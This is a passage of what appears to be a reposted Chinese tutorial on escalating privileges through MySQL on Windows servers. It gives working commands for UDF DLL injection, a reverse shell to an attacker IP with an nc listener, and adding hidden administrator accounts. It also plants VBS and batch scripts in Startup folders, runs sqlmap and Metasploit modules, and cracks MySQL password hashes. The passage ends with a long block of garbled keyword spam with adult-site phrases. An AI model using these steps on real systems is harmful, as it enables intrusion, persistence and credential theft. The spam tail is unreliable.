  7. select data from Ghost into dumpfile 'E:/PHPnow-1.5.6/MySQL-5.0.90/lib/plugin/mysqldll'
  8.  
  9. select data from Ghost into dumpfile 'C:/websoft/MySQL/MySQL Server 5.5/lib/plugin/mysqldll.dll' 
  10.  
  11. select data from Ghost into dumpfile 'D:/phpStudy/MySQL/lib/plugin/mysqldll.dll'
  12.  
  13. select load_file('C:/ProgramData/MySQL/MySQL Server 5.1/Data/mysql/user.frm'); 
  14.  
  15. select data from Ghost into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib/plugin/mysqldll.dll'  

(3)查看FUNCTION中是否存在cmdshell和backshell

存在則刪除:

  1. drop FUNCTION cmdshell;//刪除cmdshell 
  2.  
  3. drop FUNCTION backshell;//刪除backshell  

創(chuàng)建backshell:

  1. CREATE FUNCTION backshell RETURNS STRING SONAME 'mysqldll.dll'; //創(chuàng)建backshell 

在具備獨(dú)立主機(jī)的服務(wù)器上執(zhí)行監(jiān)聽(tīng):

  1. nc -vv -l -p 44444 

執(zhí)行查詢:

  1. select backshell("192.192.192.1",44444);//修改192.192.192.1為你的IP和端口 

4.獲取webshell后添加用戶命令

注意如果不能直接執(zhí)行,則需要到c:\windows\system32\下執(zhí)行

  1. net user antian365 www.xianzhi.aliyun.com /add 
  2.  
  3. net localgroup administrators antian365  

1.6.4sqlmap直連數(shù)據(jù)庫(kù)提權(quán)

Sqlmap直接連接數(shù)據(jù)庫(kù)提權(quán),需要有寫(xiě)入權(quán)限和root賬號(hào)及密碼,命令如下:

(1)連接數(shù)據(jù)庫(kù)

  1. sqlmap.py -d "mysql://root:123456@219.115.1.1:3306/mysql" --os-shell 

(2)選擇操作系統(tǒng)的架構(gòu),32位操作系統(tǒng)選擇1,64位選擇2.

(3)自動(dòng)上傳udf或提示os-shell

(4)執(zhí)行whomai命令如果獲取系統(tǒng)權(quán)限,則表示提權(quán)成功。

4.msfudf提權(quán)

Kali滲透測(cè)試平臺(tái)下執(zhí)行(kali下載地https://www.kali.org/downloads/):

  1. msfconsole 
  2. use exploit/windows/mysql/mysql_payload 
  3. options 
  4. set rhost 192.168.2.1 
  5. set rport 3306 
  6. set username root 
  7. set password 123456 
  8. run 0或者exploit  

msf下udf提權(quán)成功率并不高,跟windows操作系統(tǒng)版本,權(quán)限和數(shù)據(jù)庫(kù)版本有關(guān),特別是secure-file-priv選項(xiàng),如果有該選項(xiàng)基本不會(huì)成功。

1.6.4啟動(dòng)項(xiàng)提權(quán)

1.創(chuàng)建表并插入vbs腳本到表中

依次使用以下命令:

  1. show databases ; 
  2. use test; 
  3. show tables; 
  4. create table a (cmd text);  
  5. insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );  
  6. insert into a values ("a=wshshell.run (""cmd.exe /c net user aspnetaspnettest/add"",0)") ; 
  7. insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators aspnet /add"",0) " );  
  8. select \ from a;  

導(dǎo)出vbs腳本到啟動(dòng)

使用以下命令將剛才在a表中創(chuàng)建的vbs腳本導(dǎo)出到啟動(dòng)選項(xiàng)中。

  1. select \ from a into outfile "C:\\Documents and Settings\\All Users\\「開(kāi)始」菜單\\程序\\啟動(dòng)\\a.vbs"

導(dǎo)入成功后,系統(tǒng)重新啟動(dòng)時(shí)會(huì)自動(dòng)添加密碼為“1”且用戶名稱為“1”的用戶到管理員組中。在實(shí)際使用過(guò)程中該腳本成功執(zhí)行的幾率比較低,有時(shí)候會(huì)出現(xiàn)不能導(dǎo)出的錯(cuò)誤.

推薦使用以下腳本:

  1. show databases ; 
  2. use test; 
  3. show tables; 
  4. create table b (cmd text);  
  5. insert into b values ("net user Aspnet123545345! /add"); 
  6. insert into b values ("net localgroup administrators Aspnet /add"); 
  7. insert into b values ("del b.bat"); 
  8. select  from b into outfile "C:\\Documents and Settings\\All Users\\「開(kāi)始」菜單\\程序\\啟動(dòng)\\b.bat" 

該腳本執(zhí)行后雖然會(huì)閃現(xiàn)Dos窗口,如果有權(quán)限導(dǎo)入到啟動(dòng)選項(xiàng)中,則一定會(huì)執(zhí)行成功,在虛擬機(jī)中通過(guò)MySQL連接器連接并執(zhí)行以上命令后,在C:\Documents and Settings\All Users\「開(kāi)始」菜單\程序\啟動(dòng)目錄中會(huì)有剛才導(dǎo)出的b.bat腳本文件

說(shuō)明

在不同的操作系統(tǒng)中C:\Documents and Settings\All Users\「開(kāi)始」菜單\程序\啟動(dòng)目錄文件名稱可能會(huì)不同,這個(gè)時(shí)候就要將其目錄換成相應(yīng)的目錄名稱即可。例如如果是英文版本操作系統(tǒng)則其插入的代碼為:

  1. select from b into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\b.bat"

Windows 2008 Server的啟動(dòng)目錄為:

  1. C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\iis.vbs 

其vbs方法可以參考如下寫(xiě)法:

  1. create table a (cmd text); 
  2.  
  3. insert into a values ("set wshshell=createobject (""wscript.shell"" ) " ); 
  4.  
  5. insert into a values ("a=wshshell.run (""cmd.exe /c net user antian365 qwer1234!@# /add"",0) " ); 
  6.  
  7. insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators antian365 /add"",0) " ); 
  8.  
  9. select \ from a into outfile "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\iis.vbs" 

3.msf下模塊exploit/windows/mysql/mysql_start_up提權(quán)

  1. use exploit/windows/mysql/mysql_start_up 
  2.  
  3. set rhost 192.168.2.1 
  4.  
  5. set rport 3306 
  6.  
  7. set username root 
  8.  
  9. set password 123456 
  10.  
  11. run  

msf下mysql_start_up提權(quán)有一定的幾率,對(duì)英文版系統(tǒng)支持較好。

1.7Msf其它相關(guān)漏洞提權(quán)

1.Mysql身份認(rèn)證漏洞及利用(CVE-2012-2122)

當(dāng)連接MariaDB/MySQL時(shí),輸入的密碼會(huì)與期望的正確密碼比較,由于不正確的處理,會(huì)導(dǎo)致即便是memcmp()返回一個(gè)非零值,也會(huì)使MySQL認(rèn)為兩個(gè)密碼是相同的。也就是說(shuō)只要知道用戶名,不斷嘗試就能夠直接登入SQL數(shù)據(jù)庫(kù)。按照公告說(shuō)法大約256次就能夠蒙對(duì)一次。受影響的產(chǎn)品: All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 存在漏洞.

MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23不存在漏洞.

MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not不存在漏洞.

  1. use auxiliary/scanner/mysql/mysql_authbypass_hashdump 

2.exploit/windows/mysql/mysql_yassl_hello

3.exploit/windows/mysql/scrutinizer_upload_exec

1.8.mysql密碼破解

1.8.1cain工具破解mysql密碼

使用UltraEdit-32編輯器直接打開(kāi)user.MYD文件,打開(kāi)后使用二進(jìn)制模式進(jìn)行查看,在root用戶后面是一串字符串,選中這些字符串將其復(fù)制到記事本中,這些字符串即為用戶加密值,例如506D1427F6F61696B4501445C90624897266DAE3。

注意:

root后面的“”不要復(fù)制到字符串中。

在有些情況下需要往后面看看,否則得到的不是完整的MYSQLSHA1密碼,總之其正確的密碼位數(shù)是40位。

安裝cain工具,使用cracker,右鍵單擊“Add tolist”將Mysql Hashes值加入到破解列表中,使用軟件中的字典、暴力破解等方式來(lái)進(jìn)行暴力破解。

1.8.2網(wǎng)站在線密碼破解

cmd5.com破解。將獲取的mysql值放在cmd5.com網(wǎng)站中進(jìn)行查詢,mysql密碼一般都是收費(fèi)的。

somd5.com破解。Somd5.com是后面出現(xiàn)的一個(gè)免費(fèi)破解網(wǎng)站,每次破解需要手工選擇圖形碼進(jìn)行破解,速度快,效果好,只是每次只能破解一個(gè),而且破解一次后需要重新輸入驗(yàn)證碼。

1.8.3oclhash破解

hashcat支持很多種破解算法,免費(fèi)開(kāi)源軟件,官方網(wǎng)站https://hashcat.net/hashcat/,破解命令:

hashcat64.exe -m 200myql.hashpass.dict //破解MySQL323類(lèi)型

hashcat64.exe -m 300myql.hashpass.dict //破解MySQL4.1/MySQL5類(lèi)型

1.8.4 John the Ripper password cracker

John the Ripper下載地址:http://www.openwall.com/john/h/john179w2.zip,John the Ripper除了能夠破解linux外,還能破解多種格式的密碼。

Echo 81F5E21E35407D884A6CD4A731AEBFB6AF209E1B>hashes.txt

John –format =mysql-sha1 hashes.txt

john --list=formats | grep mysql //查看支持mysql密碼破解的算法 

責(zé)任編輯:龐桂玉 來(lái)源: 36大數(shù)據(jù)
相關(guān)推薦

2019-01-02 11:10:40

MySQL數(shù)據(jù)庫(kù)數(shù)據(jù)庫(kù)設(shè)計(jì)

2016-12-29 12:24:33

MySQL數(shù)據(jù)庫(kù)移植

2011-08-11 11:06:20

SSAS多維數(shù)據(jù)庫(kù)數(shù)據(jù)倉(cāng)庫(kù)

2019-07-11 08:45:00

MySQL數(shù)據(jù)庫(kù)緩存

2019-08-01 07:31:51

數(shù)據(jù)庫(kù)主機(jī)日志

2011-03-04 14:39:03

MySQL數(shù)據(jù)庫(kù)mysqldump

2023-06-11 17:24:26

2010-05-31 15:12:44

MySQL數(shù)據(jù)庫(kù)

2012-10-23 16:28:51

2023-07-26 17:13:38

2011-08-05 14:02:17

MySQL數(shù)據(jù)庫(kù)異常處理

2010-02-22 11:13:39

2011-08-03 18:18:37

MySQL數(shù)據(jù)庫(kù)目錄結(jié)構(gòu)

2016-09-29 14:37:39

ImageMagick漏洞分析

2010-05-24 17:42:44

MySQL數(shù)據(jù)庫(kù)

2019-11-07 15:39:36

數(shù)據(jù)庫(kù)MySQL文章

2019-09-16 08:28:17

Mysql數(shù)據(jù)庫(kù)binlog

2019-09-26 10:41:21

MySQL數(shù)據(jù)庫(kù)計(jì)數(shù)器

2011-07-19 16:36:25

Audit插件MySQL數(shù)據(jù)庫(kù)

2019-01-16 14:20:42

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

精品国精品国产自在久不卡| 国产三级aaa| 国产99在线| 91亚洲国产成人精品一区二三| 97成人精品区在线播放| 男女黄床上色视频| 国产福利91精品一区二区| 国产精品久久久久毛片软件| 亚洲自拍偷拍色图| 久久午夜免费视频| 欧美国产一级| 亚洲激情 国产| 狠狠操精品视频| 黄色成年人视频在线观看| 国产成人在线观看| 国产suv精品一区二区| 欧美又粗又大又长| 国产欧美一区| 日韩视频一区二区三区在线播放| 欧美s码亚洲码精品m码| 快射av在线播放一区| 99精品国产99久久久久久白柏| 国产精品老女人精品视频| 免费人成视频在线| 成人婷婷网色偷偷亚洲男人的天堂| 91精品国产综合久久久久久漫画| 毛片一区二区三区四区| 欧洲黄色一区| 中文字幕视频一区| 欧美伦理一区二区| 丰满人妻熟女aⅴ一区| 奇米精品一区二区三区在线观看一| 欧美黄色免费网站| 91香蕉视频网| 欧美综合一区| 亚洲精品一区二区三区在线观看| 日韩高清第一页| 欧美男体视频| 婷婷久久综合九色国产成人 | 亚洲国产中文字幕在线视频综合| 亚洲国产精品123| 青草久久伊人| 99久久国产综合精品女不卡| 亚洲伊人一本大道中文字幕| 国产亚洲久一区二区| 久久激情网站| 欧美一级在线亚洲天堂| 日韩精品一区三区| 国产综合视频| 久久99热这里只有精品国产| 国产精品99久久久久久成人| 欧美激情777| 日韩中文字幕在线视频| 老司机福利在线观看| 国产一区二区三区四区大秀| 亚洲人成在线观看网站高清| 久久精品国产亚洲AV熟女| 日日天天久久| 亚洲欧美一区二区精品久久久| 亚洲最大的黄色网| 麻豆一区二区| 亚洲精品综合精品自拍| 亚洲第一香蕉网| 精品国产91| 在线成人激情黄色| 熟女少妇a性色生活片毛片| 日本不卡高清| 久久久久北条麻妃免费看| 精品国产欧美日韩不卡在线观看 | 国产成人一区二区三区别| 在线播放免费av| 亚洲黄色小视频| 狠狠精品干练久久久无码中文字幕 | 国产精品美女呻吟| 最新在线中文字幕| 精久久久久久久久久久| 亚洲综合日韩在线| 日韩一区二区三区在线观看视频| 99免费精品视频| 欧美一区视久久| 久操视频在线免费播放| 成人欧美一区二区三区1314| 免费观看亚洲视频| 国产精品一二三产区| 一本大道久久a久久综合| 超碰在线公开97| 国产麻豆一区二区三区| 亚洲精品一区二区三区香蕉| 3d动漫精品啪啪一区二区下载| 欧美在线电影| 欧美黑人国产人伦爽爽爽| 国语对白永久免费| 久88久久88久久久| 国产日韩久久| 久草在线青青草| 亚洲激情图片一区| 北条麻妃在线一区| 日韩欧美中文字幕一区二区三区 | 九九在线视频| 亚洲激情第一区| 色诱视频在线观看| 亚洲三级av| 国产亚洲精品日韩| 精品爆乳一区二区三区无码av| 欧美一级一区| 亚洲在线视频福利| 国产一级在线| 亚洲一区二区三区四区五区黄| 日本在线视频www| 日韩精品一区二区三区中文在线| 日韩精品高清在线观看| 老湿机69福利| 毛片一区二区三区| 久久伊人一区二区| 任你弄在线视频免费观看| 欧美最新大片在线看| 久久精品无码专区| 天天做综合网| 国产精品96久久久久久| 少妇一区二区三区四区| 亚洲青青青在线视频| 日本999视频| 麻豆成人入口| 欧美精品久久久久久久免费观看| 日韩乱码一区二区三区| 99久久伊人精品| 免费的av在线| 97久久精品一区二区三区的观看方式| 亚洲欧美制服丝袜| 日韩毛片在线视频| 国产精品69毛片高清亚洲| 亚洲一卡二卡三卡| 日韩av超清在线观看| 日韩不卡在线观看| 国产无遮无挡120秒| 国产精品亚洲а∨天堂免在线| 四虎永久国产精品| 久久久一本精品| 亚洲精品一区二区三区不| 国产大片aaa| 福利一区在线观看| 国产香蕉一区二区三区| 9999精品视频| 日韩在线观看av| 亚洲自拍偷拍另类| 中文字幕在线观看一区| 中文字幕 91| 清纯唯美亚洲综合一区| 国产精品视频自拍| 午夜在线视频| 欧美猛男男办公室激情| 国产美女网站视频| 精品一区二区三区视频在线观看| 亚洲乱码一区二区三区| 超碰这里只有精品| 色综合影院在线| 亚洲天堂网在线观看视频| 国产精品欧美综合在线| www.cao超碰| 天天综合亚洲| 97超碰最新| 6699嫩草久久久精品影院| 亚洲国产精品高清久久久| 日本一级淫片免费放| av爱爱亚洲一区| 一本大道熟女人妻中文字幕在线 | 久久亚洲AV无码| 国产91丝袜在线播放0| 美女扒开大腿让男人桶| 欧美中文一区| 欧美一级大片视频| 成人精品一区二区三区免费| 欧美日韩一区二区三区免费看 | 亚洲欧洲视频在线观看| 色悠悠久久综合| 欧美福利在线视频| 国产精品一区免费在线观看| 国产91在线亚洲| 美国一区二区| 国产精品久久久久久久午夜| 九七电影韩国女主播在线观看| 一级特黄免费视频| 自拍偷自拍亚洲精品播放| 一二三区视频在线观看| 免费看的黄色欧美网站| 一区国产精品| 91精品啪在线观看国产手机| 欧美亚洲国产日韩2020| 中文日本在线观看| 精品国产一区二区三区av性色 | 色噜噜狠狠狠综合欧洲色8| 亚洲第一精品夜夜躁人人爽 | 蜜桃成人免费视频| 四虎影视国产精品| 97国产精品视频| eeuss影院www在线观看| 欧美videos大乳护士334| 国产中文字幕视频| 亚洲男人的天堂一区二区| 熟妇高潮精品一区二区三区| 蜜桃精品视频在线| 国产精品999视频| 欧美激情777| 免费成人av网站| 欧美欧美在线| 国产成人午夜视频网址| 久操av在线| www.亚洲成人| 久久天堂电影| 精品国产乱码久久久久久老虎| 日日夜夜狠狠操| 亚洲一区视频在线| av资源在线免费观看| 91蜜桃传媒精品久久久一区二区| 天堂在线中文在线| 欧美亚洲一级| 亚洲 自拍 另类小说综合图区| 97精品国产| 日本成人黄色免费看| 第四色在线一区二区| 成人黄色大片在线免费观看| 成人欧美一区二区三区的电影| 欧美激情网友自拍| 精品国产白色丝袜高跟鞋| 国产午夜精品美女视频明星a级| 色一情一乱一区二区三区| 91精品国产丝袜白色高跟鞋| 中文字幕 欧美激情| 色综合咪咪久久| 日韩美女视频网站| 亚洲国产日韩av| 国产精品 欧美激情| 中文字幕日韩一区| 人妻无码一区二区三区免费| 国产三级精品三级在线专区| 国产美女视频免费观看下载软件| 国产成人在线观看免费网站| 欧美日韩理论片| 国产真实乱对白精彩久久| 国产成人黄色网址| 秋霞午夜鲁丝一区二区老狼| 北条麻妃在线视频| 日日骚欧美日韩| 免费大片在线观看| 老妇喷水一区二区三区| 红桃av在线播放| 久久精品日韩欧美| 蜜臀久久99精品久久久酒店新书| 久久狠狠婷婷| 成人羞羞国产免费网站| 久久久久看片| 999精品视频在线| 毛片av一区二区| wwwwwxxxx日本| 精品在线观看免费| 亚洲一级片免费观看| 国产成人精品免费| 亚洲啪av永久无码精品放毛片 | 韩国成人免费视频| 久久久亚洲国产天美传媒修理工| 波多野结衣在线播放| 国内精品视频在线| 天堂8中文在线最新版在线| 国产91九色视频| 精品自拍视频| 91精品国自产在线观看| 成人av影音| 欧美日韩精品免费观看| 欧美综合另类| 日韩一二区视频| 国产亚洲一区在线| 久久久久免费精品| 免费成人美女在线观看| 日韩欧美中文视频| av资源网一区| 中文字幕成人动漫| 亚洲欧美偷拍另类a∨色屁股| 青青草成人免费| 欧美日韩一区二区免费在线观看 | 国产激情在线播放| 国产成人涩涩涩视频在线观看| **国产精品| 国产区一区二区| 日韩精品水蜜桃| 国产av熟女一区二区三区| 视频一区视频二区中文字幕| 免费成人黄色大片| 91在线视频免费观看| 一级片黄色录像| 性久久久久久久久久久久| 中文字幕精品一区二区精| 日韩美女视频一区二区在线观看| 神马久久高清| 久久影院在线观看| 亚洲天堂电影| 99久久精品免费看国产四区| 国产精品一区二区99| 人人妻人人澡人人爽欧美一区 | 亚洲国产精品嫩草影院| 国产情侣免费视频| 精品免费国产二区三区| a天堂中文在线| 国内精品久久久久久影视8| 国产成人免费精品| 久久天天狠狠| 国产精品magnet| 一级黄色特级片| 久久亚洲精品小早川怜子| 九九热最新地址| 欧美亚洲自拍偷拍| 少妇高潮久久久| 久久99精品久久久久久琪琪| gogo亚洲高清大胆美女人体| aa成人免费视频| 999国产精品视频| 日批视频在线免费看| 国产不卡一区视频| sm捆绑调教视频| 91久久精品一区二区三| 天堂在线观看av| 欧美激情手机在线视频 | 久草在线视频福利| 91丝袜美腿美女视频网站| 欧美日韩黑人| 六月丁香婷婷激情| av网站一区二区三区| 国产十六处破外女视频| 欧美日韩三级在线| 国产福利免费在线观看| 欧美一区二区三区四区在线| aaa国产精品| 免费的av在线| 国产一区二区三区国产| 2014亚洲天堂| 欧美日韩www| 日本www在线观看视频| 国产精品久久久久久av福利软件| 九九在线高清精品视频| 大陆极品少妇内射aaaaa| 成人av午夜影院| 国产精品第一页在线观看| 精品久久久久久无| 波多野在线观看| 国产精品我不卡| 国内视频精品| 国产香蕉精品视频| 亚洲国产色一区| 色窝窝无码一区二区三区| 777精品视频| 免费国产自久久久久三四区久久| 免费无码国产v片在线观看| 99麻豆久久久国产精品免费| 日韩特黄一级片| 亚洲精品视频播放| 春暖花开亚洲一区二区三区| 亚洲 国产 日韩 综合一区| 麻豆视频一区二区| 日韩免费av一区| 日韩一区二区三区三四区视频在线观看 | 日本不卡不码高清免费观看| 国产又粗又猛又色| 一本色道亚洲精品aⅴ| 成人在线免费看| 国产日韩专区在线| 综合天堂av久久久久久久| 国产艳妇疯狂做爰视频| 欧美日韩日本国产| 岛国在线大片| 91夜夜揉人人捏人人添红杏| 欧美日本一区二区视频在线观看| 你懂的在线观看网站| 一本色道久久综合精品竹菊| 午夜视频在线观看免费视频| 91九色视频在线观看| 国产一区二区三区久久| 久久久久久久久久久久久久久| 欧美群妇大交群中文字幕| 午夜激情在线| 久久久久天天天天| 蜜桃av一区二区三区电影| 久久久久成人精品无码| 亚洲精品色婷婷福利天堂| 电影91久久久| 亚洲不卡中文字幕无码| 国产精品亲子乱子伦xxxx裸| 亚洲AV无码成人片在线观看| 国产mv久久久| 国内精品久久久久久久影视麻豆| 色欲av无码一区二区三区| 3d成人动漫网站| 成人免费直播| 亚洲爆乳无码精品aaa片蜜桃| 久久久久久日产精品| 国产丝袜视频在线观看| 国语对白做受69| 成人中文在线| av无码一区二区三区| 欧美日韩五月天| 国产理论电影在线| 亚洲日本无吗高清不卡|